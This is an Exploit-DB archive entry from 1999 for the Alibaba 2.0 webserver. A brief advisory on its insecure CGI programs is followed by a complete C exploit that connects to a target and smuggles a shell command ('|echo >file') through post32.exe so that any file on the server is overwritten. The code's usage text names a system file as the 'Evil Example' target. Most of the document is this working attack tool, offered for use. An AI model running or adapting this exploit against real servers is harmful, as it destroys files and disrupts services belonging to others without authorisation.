Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilities

EDB-ID:

19595


Author:

Kerb

Type:

remote


Platform:

Windows

Date:

1999-11-03


// source: https://www.securityfocus.com/bid/770/info

There are several CGI programs that ship with the Alibaba webserver. Many of these do not do proper input handling, and therefore will allow requests for access to files outside of normal or safe webserver practice. This results in various situations where an attacker can view, overwrite, create and delete files anywhere on the server. 

/*

 Description: DoS against Alibaba 2.0 WebServer by wildcoyote
 Comments   : Based on advisorie by Prizm<Prizm@RESENTMENT.org>
              It is possible to overwrite any file on the remote box!
 Platforms  : Alibaba runs on Win95/98/NT
 Flamez to  : wildcoyote@coders-pt.org

*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>

// If it didnt work, uncomment (JUST ONE) of the following defines...
// (In case of one of them, isn't present...)
#define vulnerable_cgi "/cgi-bin/post32.exe"
// #define vulnerable_cgi "/cgi-bin/post16.exe"
// #define vulnerable_cgi "/cgi-bin/get16.exe"


int 
openhost(char *host,int port) {
   int sock;
   struct sockaddr_in addr;
   struct hostent *he;
      
   he=gethostbyname(host);
   
   if (he==NULL) return -1;
   
   sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
    
   if (sock==-1) return -1;
    
   memcpy(&addr.sin_addr, he->h_addr, he->h_length);
   addr.sin_family=AF_INET;
   addr.sin_port=htons(port);

   if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1;
    
   return sock;
}

void 
sends(int sock,char *buf) {
  write(sock,buf,strlen(buf));
}

void 
overwrite(char *host, char *file, int port)
{
 int sock,i;
 char buf[512];
 printf("\nAlibaba 2.0 WebServer File Overwrite Xploit by wildcoyote\n\n");
 printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
 sock=openhost(host,port);
 if(sock==-1) {
     printf("- Could not connect -\n");
     printf("Exiting...\n\n");
     exit(-1);
 }
 else printf("Connected to %s (%d)\n",host,port);
 sprintf(buf,"GET %s|echo%20>%s\n\n",vulnerable_cgi,file);
 printf("Oh k! Trying to overwrite the file...\n");
 sends(sock,buf);
 close(sock);
 printf("All done, the file was *probably* overwrited ;)\n");
 printf("Send flamez to wildcoyote@coders-pt.org, *Enjoy*...\n\n");
}

main(int argc, char *argv[])
{
 int sock,i;
 if (argc<3) {
    printf("\nAlibaba 2.0 WebServer File Overwrite Xploit by wildcoyote\n\n");
    printf("Sintaxe: %s <host> <path to file to overwrite> [port - default 80]\n",argv[0]);
    printf("Warning: Path to file must be a valid DoS path :)\n");
    printf("Evil Example: %s www.vulnerable.alibaba.com c:\\windows\\win.ini\n",argv[0]);
    printf("Send flamez to wildcoyote@coders-pt.org, *Enjoy*...\n\n");
 }
 else if (argc==3) overwrite(argv[1],argv[2],80);
      else overwrite(argv[1],argv[2],atoi(argv[3]));
}